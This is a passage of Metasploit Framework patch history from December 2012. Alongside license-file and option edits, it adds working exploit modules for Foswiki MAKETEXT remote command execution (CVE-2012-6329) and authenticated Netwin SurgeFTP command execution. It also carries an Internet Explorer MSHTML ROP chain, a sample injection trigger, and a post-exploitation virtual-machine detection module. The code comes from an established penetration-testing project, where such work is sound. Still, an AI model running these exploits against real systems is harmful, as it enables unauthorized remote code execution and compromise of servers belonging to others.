Msf::Exploit::Remote # Offset to CFunctionPointer vftable in MSHTML case datastore['MSHTML'] when '8.0.6001.18702' - @offset = 0xbf190 + @offset = 0xbf190 when '8.0.6001.19120' - @offset = 0xd92c8 + @offset = 0xd92c8 end super end @@ -533,7 +533,7 @@ class Metasploit3 < Msf::Exploit::Remote [ :junk, :junk, - 0x328468, # push ecx # pop esp # pop edi # pop esi # pop ebp # retn 14 + 0x328468, # push ecx # pop esp # pop edi # pop esi # pop ebp # retn 14 :junk, 0x247e5d, # ROP NOPs 0x247e5d, @@ -542,24 +542,24 @@ class Metasploit3 < Msf::Exploit::Remote 0x247e5d, 0x247e5d, 0x247e5d, - 0x247e5c, # POP ESI # RETN [mshtml.dll] + 0x247e5c, # POP ESI # RETN [mshtml.dll] 0x137c, # ptr to &VirtualProtect() [IAT mshtml.dll] - 0x3c8db7, # MOV EDX,DWORD PTR DS:[ESI] # ADD EAX,8BCE8B00 # RETN [mshtml.dll] - 0x42e239, # PUSH EDX # XOR EAX,EAX # POP ESI # POP EBP # RETN 0x08 [mshtml.dll] + 0x3c8db7, # MOV EDX,DWORD PTR DS:[ESI] # ADD EAX,8BCE8B00 # RETN [mshtml.dll] + 0x42e239, # PUSH EDX # XOR EAX,EAX # POP ESI # POP EBP # RETN 0x08 [mshtml.dll] :junk, - 0x3460c, # POP EBP # RETN [mshtml.dll] + 0x3460c, # POP EBP # RETN [mshtml.dll] :junk, :junk, 0x23ef79, # & jmp esp [mshtml.dll] - 0x189303, # POP EBX # RETN [mshtml.dll] + 0x189303, # POP EBX # RETN [mshtml.dll] :ebx, # 0x00000201-> ebx - 0x20437c, # POP EDX # RETN [mshtml.dll] + 0x20437c, # POP EDX # RETN [mshtml.dll] :edx, # 0x00000040-> edx - 0xc277, # POP ECX # RETN [mshtml.dll] + 0xc277, # POP ECX # RETN [mshtml.dll] 0x53a47d, # &Writable location [mshtml.dll] - 0x4a33e2, # POP EDI # RETN [mshtml.dll] + 0x4a33e2, # POP EDI # RETN [mshtml.dll] 0x4b601, # RETN (ROP NOP) [mshtml.dll] - 0x33fbc6, # POP EAX # RETN [mshtml.dll] + 0x33fbc6, # POP EAX # RETN [mshtml.dll] :nop, 0x52c718 # PUSHAD # RETN [mshtml.dll] ] @@ -568,7 +568,7 @@ class Metasploit3 < Msf::Exploit::Remote rop_gadgets = [ :junk, - 0x3338ae, # push ecx # pop esp # pop edi # pop esi # pop ebp # retn 14 + 0x3338ae, # push ecx # pop esp # pop edi # pop esi # pop ebp # retn 14 :junk, 0xe9e7, # POP ECX # RETN [mshtml.dll] 0x6358e9e7 :junk, From be7da83feb2127ba509fd270327c20753f5fc292 Mon Sep 17 00:00:00 2001 From: David Maloney Date: Fri, 21 Dec 2012 14:22:21 -0600 Subject: [PATCH 036/154] Adds EHLO domain to smtp deliver Allow the user to set the EHLO domain for the smtp deliver module. This is needed for Pro functionality [story #41549217] --- lib/msf/core/exploit/smtp_deliver.rb | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/lib/msf/core/exploit/smtp_deliver.rb b/lib/msf/core/exploit/smtp_deliver.rb index da2f2abe86..01aa4ba334 100644 --- a/lib/msf/core/exploit/smtp_deliver.rb +++ b/lib/msf/core/exploit/smtp_deliver.rb @@ -31,6 +31,7 @@ module Exploit::Remote::SMTPDeliver OptString.new('SUBJECT', [ true, 'Subject line of the email' ]), OptString.new('USERNAME', [ false, 'SMTP Username for sending email', '' ]), OptString.new('PASSWORD', [ false, 'SMTP Password for sending email', '' ]), + OptString.new('DOMAIN', [false, 'SMTP Domain to EHLO to', '']), OptString.new('VERBOSE', [ false, 'Display verbose information' ]), ], Msf::Exploit::Remote::SMTPDeliver) register_autofilter_ports([ 25, 465, 587, 2525, 25025, 25000]) @@ -72,7 +73,11 @@ module Exploit::Remote::SMTPDeliver print_verbose("Connecting to SMTP server #{rhost}:#{rport}...") nsock = connect(global) - domain = Rex::Text.rand_text_alpha(rand(32)+1) + if datastore['DOMAIN'] and not datastore['DOMAIN'] == '' + domain = datastore['DOMAIN'] + else + domain = Rex::Text.rand_text_alpha(rand(32)+1) + end res = raw_send_recv("EHLO #{domain}\r\n", nsock) if res =~ /STARTTLS/ From ef8e3416e937c74d2208371748fd7384ab9c01a8 Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Fri, 21 Dec 2012 14:22:56 -0600 Subject: [PATCH 037/154] Updating THIRD-PARTY.md Moved PacketFu to 3-Clause BSD. Added Kiss FFT, Kiss FFT wrapper, and Armitage to 3-Clause BSD. --- THIRD-PARTY.md | 80 +++++++++++++++++++++++++------------------------- 1 file changed, 40 insertions(+), 40 deletions(-) diff --git a/THIRD-PARTY.md b/THIRD-PARTY.md index e5b46e4207..45fdad5e51 100644 --- a/THIRD-PARTY.md +++ b/THIRD-PARTY.md @@ -85,42 +85,6 @@ Ruby ```` - -PacketFu -======== - - The PacketFu library located under lib/packetfu. - Copyright (c) 2008-2012, Tod Beardsley - -```` -Copyright (c) 2008-2012, Tod Beardsley -All rights reserved. - -Redistribution and use in source and binary forms, with or without -modification, are permitted provided that the following conditions are met: - - * Redistributions of source code must retain the above copyright - notice, this list of conditions and the following disclaimer. - * Redistributions in binary form must reproduce the above copyright - notice, this list of conditions and the following disclaimer in the - documentation and/or other materials provided with the distribution. - * Neither the name of Tod Beardsley nor the - names of its contributors may be used to endorse or promote products - derived from this software without specific prior written permission. - -THIS SOFTWARE IS PROVIDED BY TOD BEARDSLEY ''AS IS'' AND ANY -EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED -WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE -DISCLAIMED. IN NO EVENT SHALL TOD BEARDSLEY BE LIABLE FOR ANY -DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES -(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; -LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND -ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT -(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS -SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. -```` - - - GPL === - The modified TightVNC binaries and their associated source code. @@ -1016,15 +980,15 @@ OpenSSL License MIT === - - The SSHKey library located under lib/sshkey. + - The SSHKey library located under lib/sshkey/ Copyright (c) 2011 James Miller - - The Net::SSH library located under lib/net/ssh. + - The Net::SSH library located under lib/net/ssh/ Copyright (c) 2008 Jamis Buck - - Anemone located under lib/anemone + - Anemone located under lib/anemone/ Copyright (c) 2009 Vertive, Inc. - RKelly located under lib/rkelly/ Copyright (c) 2007, 2008, 2009 Aaron Patterson, John Barnette - - Gem components located under lib/gemcache + - Gem components located under lib/gemcache/ * actionmailer - Copyright (c) 2004-2011 David Heinemeier Hansson * actionpack - Copyright (c) 2004-2011 David Heinemeier Hansson * activemodel - Copyright (c) 2004-2011 David Heinemeier Hansson @@ -1081,3 +1045,39 @@ WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. ```` +3-Clause BSD +============ + - The PacketFu library located under lib/packetfu/ + Copyright (c) 2008-2012, Tod Beardsley + - The Kiss FFT library located under external/ruby-kissfft/ + Copyright (c) 2003-2010 Mark Borgerding + - The Kiss FFT wrapper layer, located under external/ruby-kissfft/ + Copyright (C) 2009-2012 H D Moore < hdm[at]rapid7.com > + - Armitage, located under external/source/armitage and data/armitage/ + Copyright (C) 2010-2012 Raphael Mudge + +```` +Redistribution and use in source and binary forms, with or without +modification, are permitted provided that the following conditions are met: + + * Redistributions of source code must retain the above copyright + notice, this list of conditions and the following disclaimer. + * Redistributions in binary form must reproduce the above copyright + notice, this list of conditions and the following disclaimer in the + documentation and/or other materials provided with the distribution. + * Neither the name of Tod Beardsley nor the + names of its contributors may be used to endorse or promote products + derived from this software without specific prior written permission. + +THIS SOFTWARE IS PROVIDED BY TOD BEARDSLEY ''AS IS'' AND ANY +EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED +WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE +DISCLAIMED. IN NO EVENT SHALL TOD BEARDSLEY BE LIABLE FOR ANY +DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES +(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; +LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND +ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT +(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS +SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. +```` + From 0bdc18708429508a802d1b6b20e43a6bbc5b525c Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Fri, 21 Dec 2012 14:25:07 -0600 Subject: [PATCH 038/154] Adding fastlib --- THIRD-PARTY.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/THIRD-PARTY.md b/THIRD-PARTY.md index 45fdad5e51..2da68caef7 100644 --- a/THIRD-PARTY.md +++ b/THIRD-PARTY.md @@ -18,6 +18,8 @@ Ruby Copyright (c) 2004 David R. Halliday - The Zip library located under lib/zip. Copyright (C) 2002-2004 Thomas Sondergaard + - FastLib located at lib/fastlib.rb + Copyright (C) 2011 Rapid7 - Gem components located under lib/gemcache/ * rdoc - RDoc is Copyright (c) 2001-2003 Dave Thomas, The Pragmatic Programmers. Portions (c) 2007-2011 Eric Hodel. Portions copyright others, see individual From 9a710175adc62c114e65a9deeec87f8b456614dc Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Fri, 21 Dec 2012 14:52:24 -0600 Subject: [PATCH 039/154] Added a bunch of gems builder coderay journey metasploit_data_models railties spork --- THIRD-PARTY.md | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/THIRD-PARTY.md b/THIRD-PARTY.md index 2da68caef7..fa98c50920 100644 --- a/THIRD-PARTY.md +++ b/THIRD-PARTY.md @@ -998,23 +998,29 @@ MIT * activeresource - Copyright (c) 2006-2011 David Heinemeier Hansson * activesupport - Copyright (c) 2005-2011 David Heinemeier Hansson * authlogic - Copyright (c) 2011 Ben Johnson of Binary Logic + * builder - Copyright (c) 2003-2012 Jim Weirich (jim.weirich@gmail.com) * carrierwave - Copyright (c) 2008-2012 Jonas Nicklas * chunky_png - Copyright (c) 2010 Willem van Bergen + * coderay - By Rob Aldred * daemons - Copyright (c) 2005-2012 Thomas Uehlinger * diff-lcs - Copyright 2004–2011 Austin Ziegler * formtastic - Copyright (c) 2008-2010 Justin French * fssm - Copyright (c) 2011 Travis Tilley * hike - Copyright (c) 2011 Sam Stephenson * i18n - Copyright (c) 2008 The Ruby I18n team + * journey - Copyright (c) 2011 Aaron Patterson * jquery-rails - Copyright (c) 2010 Andre Arko * liquid - Copyright (c) 2005, 2006 Tobias Luetke + * metasploit_data_models - Copyright (C) 2012, Rapid7, Inc. * method_source - Copyright (c) 2011 John Mair (banisterfiend) * multi_json - Copyright (c) 2010 Michael Bleigh, Josh Kalderimis, Erik Michaels-Ober, and Intridea, Inc. * rack - Copyright (c) 2007, 2008, 2009, 2010 Christian Neukirchen * rack-cache - Copyright (c) 2008 Ryan Tomayko * rack-ssl - Copyright (c) 2010 Joshua Peek + * railties - No copyright statement provided * rake - Copyright (c) 2003, 2004 Jim Weirich * slop - Copyright (c) 2012 Lee Jarvis + * spork - Copyright (c) 2009 Tim Harper * sprockets - Copyright (c) 2011 Sam Stephenson, Copyright (c) 2011 Joshua Peek * state_machine - Copyright (c) 2006-2012 Aaron Pfeifer * thor - Copyright (c) 2008 Yehuda Katz From d5f08a240568a6b45978746201fa684d33c7305e Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Fri, 21 Dec 2012 22:08:08 +0100 Subject: [PATCH 040/154] Added module for CVE-2012-6329 for foswiki --- .../exploits/unix/webapp/foswiki_maketext.rb | 241 ++++++++++++++++++ 1 file changed, 241 insertions(+) create mode 100644 modules/exploits/unix/webapp/foswiki_maketext.rb diff --git a/modules/exploits/unix/webapp/foswiki_maketext.rb b/modules/exploits/unix/webapp/foswiki_maketext.rb new file mode 100644 index 0000000000..9d8d7750f8 --- /dev/null +++ b/modules/exploits/unix/webapp/foswiki_maketext.rb @@ -0,0 +1,241 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Foswiki MAKETEXT Remote Command Execution', + 'Description' => %q{ + This module exploits a vulnerability in the MAKETEXT Foswiki variable. Using a + specially crafted MAKETEXT, a malicious user can execute shell commands since user + input is passed to the Perl "eval" command without first being sanitized. The + problem is caused by an underlying security issue in the CPAN:Locale::Maketext + module. This works in Foswiki sites that have user interface localization enabled + (UserInterfaceInternationalisation variable set). + + If USERNAME and PASSWORD credentials aren't provided anonymous access will be + intended. On the other hand, if the FoswikiPage option isn't provided, the module + will try to create a random page on the SandBox space. The modules has been tested + successfully on Foswiki 1.1.5 as distributed with the official Foswiki-1.1.5-vmware + virtual machine. + }, + 'Author' => + [ + 'Brian Carlson', # original discovery in Perl Locale::Maketext + 'juan vazquez' # Metasploit module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'CVE', '2012-6329' ], + [ 'OSVDB', '88410' ], + [ 'URL', 'http://foswiki.org/Support/SecurityAlert-CVE-2012-6330' ] + ], + 'Privileged' => false, # web server context + 'Payload' => + { + 'DisableNops' => true, + 'BadChars' => '', + 'Space' => 1024, + 'Compat' => + { + 'PayloadType' => 'cmd', + 'RequiredCmd' => 'generic ruby python bash telnet', + } + }, + 'Platform' => [ 'unix' ], + 'Arch' => ARCH_CMD, + 'Targets' => [[ 'Foswiki 1.1.5', { }]], + 'DisclosureDate' => 'Dec 03 2012', + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('TARGETURI', [ true, "Foswiki base path", "/" ]), + OptString.new('FoswikiPage', [ false, "Foswiki Page with edit permissions to inject the payload, by default random Page on Sandbox (Ex: /Sandbox/MsfTest)" ]), + OptString.new('USERNAME', [ false, "The user to authenticate as (anonymous if username not provided)"]), + OptString.new('PASSWORD', [ false, "The password to authenticate with (anonymous if password not provided)" ]) + ], self.class) + end + + def do_login(username, password) + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => "#{@base}bin/login", + 'vars_post' => + { + 'username' => username, + 'password' => password + } + }) + + if not res or res.code != 302 or res.headers['Set-Cookie'] !~ /FOSWIKISID=([0-9a-f]*)/ + print_status "#{res.code}\n#{res.body}" + return nil + end + + session = $1 + return session + end + + def inject_code(session, code) + + vprint_status("Retrieving the validation_key...") + + res = send_request_cgi({ + 'uri' => "#{@base}bin/edit#{@page}", + 'cookie' => "FOSWIKISID=#{session}" + }) + + if not res or res.code != 200 or res.body !~ /name='validation_key' value='\?([0-9a-f]*)'/ + vprint_error("Error retrieving the validation_key") + return nil + end + + validation_key = $1 + vprint_good("validation_key found: #{validation_key}") + + if session.empty? + if res.headers['Set-Cookie'] =~ /FOSWIKISID=([0-9a-f]*)/ + session = $1 + else + vprint_error("Error using anonymous access") + return nil + end + end + + if res.headers['Set-Cookie'] =~ /FOSWIKISTRIKEONE=([0-9a-f]*)/ + strike_one = $1 + else + vprint_error("Error getting the FOSWIKISTRIKEONE value") + return nil + end + + # Transforming validation_key in order to bypass foswiki antiautomation + validation_key = Rex::Text.md5(validation_key + strike_one) + vprint_status("Transformed validation key: #{validation_key}") + vprint_status("Injecting the payload...") + + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => "#{@base}bin/save#{@page}", + 'cookie' => "FOSWIKISID=#{session}", + 'vars_post' => + { + 'validation_key' => validation_key, + 'text' => "#{rand_text_alpha(3 + rand(3))} %MAKETEXT{\"#{rand_text_alpha(3 + rand(3))} [_1] #{rand_text_alpha(3 + rand(3))}\\\\'}; `#{code}`; { #\" args=\"#{rand_text_alpha(3 + rand(3))}\"}%" + } + + }) + + if not res or res.code != 302 or res.headers['Location'] !~ /bin\/view#{@page}/ + print_warning("Error injecting the payload") + print_status "#{res.code}\n#{res.body}\n#{res.headers['Location']}" + return nil + end + + location = URI(res.headers['Location']).path + print_good("Payload injected on #{location}") + + return location + end + + def check + @base = target_uri.path + @base << '/' if @base[-1, 1] != '/' + + res = send_request_cgi({ + 'uri' => "#{@base}System/WebHome" + }) + + if not res or res.code != 200 + return Exploit::CheckCode::Unknown + end + + if res.body =~ /This site is running Foswiki version.*Foswiki-(\d\.\d\.\d)/ + version = $1 + print_status("Version found: #{version}") + if version <= "1.1.6" + return Exploit::CheckCode::Appears + else + return Exploit::CheckCode::Safe + end + end + + return Exploit::CheckCode::Detected + end + + + def exploit + + # Init variables + @page = '' + + if datastore['FoswikiPage'] and not datastore['FoswikiPage'].empty? + @page << '/' if datastore['FoswikiPage'][0] != '/' + @page << datastore['FoswikiPage'] + else + @page << "/Sandbox/#{rand_text_alpha_lower(3).capitalize}#{rand_text_alpha_lower(3).capitalize}" + end + + @base = target_uri.path + @base << '/' if @base[-1, 1] != '/' + + # Login if needed + if (datastore['USERNAME'] and + not datastore['USERNAME'].empty? and + datastore['PASSWORD'] and + not datastore['PASSWORD'].empty?) + print_status("Trying login to get session ID...") + session = do_login(datastore['USERNAME'], datastore['PASSWORD']) + else + print_status("Using anonymous access...") + session = "" + end + + if not session + fail_with(Exploit::Failure::Unknown, "Error getting a session ID") + end + + # Inject payload + print_status("Trying to inject the payload on #{@page}...") + res = inject_code(session, payload.encoded) + if not res or res !~ /#{@page}/ + fail_with(Exploit::Failure::Unknown, "Error injecting the payload") + end + + # Execute payload + print_status("Executing the payload through #{@page}...") + res = send_request_cgi({ + 'uri' => "#{@base}#{@page}", + 'cookie' => "FOSWIKISID=#{session}" + }) + if not res or res.code != 200 or res.body !~ /HASH/ + print_status("#{res.code}\n#{res.body}") + fail_with(Exploit::Failure::Unknown, "Error executing the payload") + end + + print_good("Exploitation was successful") + + end + +end + +=begin + +* Trigger: + +%MAKETEXT{"test [_1] secondtest\\'}; `touch /tmp/msf.txt`; { #" args="msf"}% + +=end + From 529a3c9a6387b2c41396559296895a77382ff8fe Mon Sep 17 00:00:00 2001 From: sinn3r Date: Fri, 21 Dec 2012 16:10:27 -0600 Subject: [PATCH 041/154] Add Netwin SurgeFTP module --- .../multi/http/netwin_surgeftp_exec.rb | 126 ++++++++++++++++++ 1 file changed, 126 insertions(+) create mode 100644 modules/exploits/multi/http/netwin_surgeftp_exec.rb diff --git a/modules/exploits/multi/http/netwin_surgeftp_exec.rb b/modules/exploits/multi/http/netwin_surgeftp_exec.rb new file mode 100644 index 0000000000..dc0a7b8dbb --- /dev/null +++ b/modules/exploits/multi/http/netwin_surgeftp_exec.rb @@ -0,0 +1,126 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = GoodRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::CmdStagerVBS + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Netwin SurgeFTP Remote Command Execution', + 'Description' => %q{ + This module exploits a vulnerability found in Netwin SurgeFTP, version 23c8 + or prior. In order to execute commands via the FTP service, please note that + you must have a valid credential to the web-based administrative console. + }, + 'Author' => + [ + 'Spencer McIntyre', #Who found this vuln? + 'sinn3r' + ], + 'License' => MSF_LICENSE, + 'References' => + [ + ['EDB', '23522'] + ], + 'Payload' => + { + 'DisableNops' => true + }, + 'Targets' => + [ + [ 'Windows', { 'Arch'=>ARCH_X86, 'Platform'=>'win'} ], + [ 'Unix', { 'Arch'=>ARCH_CMD, 'Platform'=>'unix'} ] + ], + 'DisclosureDate' => 'Dec 06 2012')) + + register_options( + [ + Opt::RPORT(7021), + OptString.new('USERNAME', [ true, 'The username with admin role to authenticate as', 'admin' ]), + OptString.new('PASSWORD', [ true, 'The password for the specified username', 'password' ]), + OptString.new('FOLDER', [ true, 'The folder to write to for Windows target', 'C:\\Windows\\Temp\\']) + ], self.class) + + end + + def execute_command(cmd, opts) + # Unfortunately we can't use env vars + #cmd = cmd.gsub(/\%TEMP\%\\/, 'C:\\') + cmd = cmd.gsub(/\%TEMP\%\\/, datastore['FOLDER']) + http_send_command("cmd.exe /q /c #{cmd}") + end + + def http_send_command(command) + res = send_request_cgi( + { + 'uri' => '/cgi/surgeftpmgr.cgi', + 'method' => 'POST', + 'basic_auth' => datastore['USERNAME'] + ":" + datastore['PASSWORD'], + 'vars_post' => + { + 'global_smtp' => "", + 'global_restart' => "", + 'global_style' => "", + 'global_bind' => "", + 'global_passive_ip' => "", + 'global_passive_match' => "", + 'global_logon_mode' => "", + 'global_log_host' => "", + 'global_login_error' => "", + 'global_adminip' => "", + 'global_total_users' => "", + 'global_con_perip' => "", + 'global_ssl' => "", + 'global_ssl_cipher_list' => "", + 'global_implicit_port' => "", + 'log_level' => "", + 'log_home' => "", + 'global_watcher_program_ul' => "", + 'global_watcher_program_dl' => "", + 'authent_process' => command, + 'authent_cmdopts' => "", + 'authent_number' => "", + 'authent_domain' => "", + 'global_strip_user_domain' => "", + 'global_noclass' => "", + 'global_anon_hammer_over_time' => "", + 'global_anon_hammer_max' => "", + 'global_anon_hammer_block_time' => "", + 'global_port' => "", + 'global_mgr_port' => "", + 'global_mgr_ssl_port' => "", + 'cmd_global_save.x' => "36", + 'cmd_global_save.y' => "8", + } + }) + + if res and res.body =~ /401 Authorization failed/ + fail_with(Exploit::Failure::NoAccess, "Unable to log in!") + elsif not (res and res.code == 200) + fail_with(Exploit::Failure::Unknown, 'Failed to execute command.') + end + end + + def exploit + case target['Platform'] + when 'win' + print_status("#{rhost}:#{rport} - Sending VBS stager...") + execute_cmdstager({:linemax=>500}) + + when 'unix' + print_status("#{rhost}:#{rport} - Sending payload...") + http_send_command(%Q|/bin/sh -c "#{payload.encoded}"|) + end + + handler + end +end \ No newline at end of file From 1323081bce7d748c1a638b8928302bd241078e18 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Fri, 21 Dec 2012 16:11:16 -0600 Subject: [PATCH 042/154] msftidy cleanup --- modules/exploits/multi/http/netwin_surgeftp_exec.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/exploits/multi/http/netwin_surgeftp_exec.rb b/modules/exploits/multi/http/netwin_surgeftp_exec.rb index dc0a7b8dbb..1113a2f973 100644 --- a/modules/exploits/multi/http/netwin_surgeftp_exec.rb +++ b/modules/exploits/multi/http/netwin_surgeftp_exec.rb @@ -21,7 +21,7 @@ class Metasploit3 < Msf::Exploit::Remote or prior. In order to execute commands via the FTP service, please note that you must have a valid credential to the web-based administrative console. }, - 'Author' => + 'Author' => [ 'Spencer McIntyre', #Who found this vuln? 'sinn3r' @@ -41,7 +41,7 @@ class Metasploit3 < Msf::Exploit::Remote [ 'Unix', { 'Arch'=>ARCH_CMD, 'Platform'=>'unix'} ] ], 'DisclosureDate' => 'Dec 06 2012')) - + register_options( [ Opt::RPORT(7021), From ca72132fc03b708db60092ab818370adfac97a91 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Fri, 21 Dec 2012 16:23:31 -0600 Subject: [PATCH 043/154] Add a check --- modules/exploits/multi/http/netwin_surgeftp_exec.rb | 9 +++++++++ 1 file changed, 9 insertions(+) diff --git a/modules/exploits/multi/http/netwin_surgeftp_exec.rb b/modules/exploits/multi/http/netwin_surgeftp_exec.rb index 1113a2f973..daafbdb326 100644 --- a/modules/exploits/multi/http/netwin_surgeftp_exec.rb +++ b/modules/exploits/multi/http/netwin_surgeftp_exec.rb @@ -49,7 +49,16 @@ class Metasploit3 < Msf::Exploit::Remote OptString.new('PASSWORD', [ true, 'The password for the specified username', 'password' ]), OptString.new('FOLDER', [ true, 'The folder to write to for Windows target', 'C:\\Windows\\Temp\\']) ], self.class) + end + def check + res = send_request_raw({'uri'=>'/cgi/surgeftpmgr.cgi'}) + print_line(Rex::Text.to_hex_dump(res.body)) + if res and res.body =~ /surgeftp\x20\x0d\x0a\x20\x20Manager CGI/ + return Exploit::CheckCode::Detected + else + return Exploit::CheckCode::Safe + end end def execute_command(cmd, opts) From 9af8c9b4573463e7c5f329e11b99e958c08f9991 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Fri, 21 Dec 2012 18:52:40 -0600 Subject: [PATCH 044/154] Small corrections --- .../exploits/unix/webapp/foswiki_maketext.rb | 22 +++++++++---------- 1 file changed, 10 insertions(+), 12 deletions(-) diff --git a/modules/exploits/unix/webapp/foswiki_maketext.rb b/modules/exploits/unix/webapp/foswiki_maketext.rb index 9d8d7750f8..efafb4031c 100644 --- a/modules/exploits/unix/webapp/foswiki_maketext.rb +++ b/modules/exploits/unix/webapp/foswiki_maketext.rb @@ -16,18 +16,17 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Foswiki MAKETEXT Remote Command Execution', 'Description' => %q{ - This module exploits a vulnerability in the MAKETEXT Foswiki variable. Using a - specially crafted MAKETEXT, a malicious user can execute shell commands since user + This module exploits a vulnerability in the MAKETEXT Foswiki variable. By using + a specially crafted MAKETEXT, a malicious user can execute shell commands since the input is passed to the Perl "eval" command without first being sanitized. The problem is caused by an underlying security issue in the CPAN:Locale::Maketext - module. This works in Foswiki sites that have user interface localization enabled - (UserInterfaceInternationalisation variable set). + module. Only Foswiki sites that have user interface localization enabled + (UserInterfaceInternationalisation variable set) are vulnerable. - If USERNAME and PASSWORD credentials aren't provided anonymous access will be - intended. On the other hand, if the FoswikiPage option isn't provided, the module - will try to create a random page on the SandBox space. The modules has been tested - successfully on Foswiki 1.1.5 as distributed with the official Foswiki-1.1.5-vmware - virtual machine. + If USERNAME and PASSWORD aren't provided, anonymous access will be tried. + Also, if the FoswikiPage option isn't provided, the module will try to create a + random page on the SandBox space. The modules has been tested successfully on + Foswiki 1.1.5 as distributed with the official Foswiki-1.1.5-vmware image. }, 'Author' => [ @@ -45,12 +44,11 @@ class Metasploit3 < Msf::Exploit::Remote 'Payload' => { 'DisableNops' => true, - 'BadChars' => '', 'Space' => 1024, 'Compat' => { 'PayloadType' => 'cmd', - 'RequiredCmd' => 'generic ruby python bash telnet', + 'RequiredCmd' => 'generic ruby python bash telnet' } }, 'Platform' => [ 'unix' ], @@ -80,7 +78,7 @@ class Metasploit3 < Msf::Exploit::Remote }) if not res or res.code != 302 or res.headers['Set-Cookie'] !~ /FOSWIKISID=([0-9a-f]*)/ - print_status "#{res.code}\n#{res.body}" + vprint_status "#{res.code}\n#{res.body}" return nil end From 924f5283ae133eb9fa3bcafe47cb2d7a814f3eca Mon Sep 17 00:00:00 2001 From: Carlos Perez Date: Fri, 21 Dec 2012 22:11:57 -0400 Subject: [PATCH 045/154] Improvements to checkvm - Added additional checks for Hyper-V - Added additional checks for VMware - Removed $Id$ and $Revision$ (Confirmed with Todb on it) --- modules/post/windows/gather/checkvm.rb | 49 ++++++++++++++++++++++---- 1 file changed, 43 insertions(+), 6 deletions(-) diff --git a/modules/post/windows/gather/checkvm.rb b/modules/post/windows/gather/checkvm.rb index beea92dadd..c565ffb905 100644 --- a/modules/post/windows/gather/checkvm.rb +++ b/modules/post/windows/gather/checkvm.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -30,7 +26,7 @@ class Metasploit3 < Msf::Post }, 'License' => MSF_LICENSE, 'Author' => [ 'Carlos Perez '], - 'Version' => '$Revision$', + 'Version' => '', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) @@ -50,6 +46,36 @@ class Metasploit3 < Msf::Post key.close rescue end + if not vm + begin + key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'HARDWARE\DESCRIPTION\System', KEY_READ) + if key.query_value('SystemBiosVersion').data.downcase =~ /vrtual/ + vm = true + end + key.close + rescue + end + end + if not vm + begin + key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'HARDWARE\ACPI\FADT', KEY_READ) + srvvals = key.enum_key + if srvvals.include?("VRTUAL") + vm = true + end + rescue + end + end + if not vm + begin + key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'HARDWARE\ACPI\RSDT', KEY_READ) + srvvals = key.enum_key + if srvvals.include?("VRTUAL") + vm = true + end + rescue + end + end if not vm begin key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'SYSTEM\ControlSet001\Services', KEY_READ) @@ -92,7 +118,17 @@ class Metasploit3 < Msf::Post end if not vm begin - key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0') + key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'HARDWARE\DESCRIPTION\System\BIOS', KEY_READ) + if key.query_value('SystemManufacturer').data.downcase =~ /vmware/ + vm = true + end + key.close 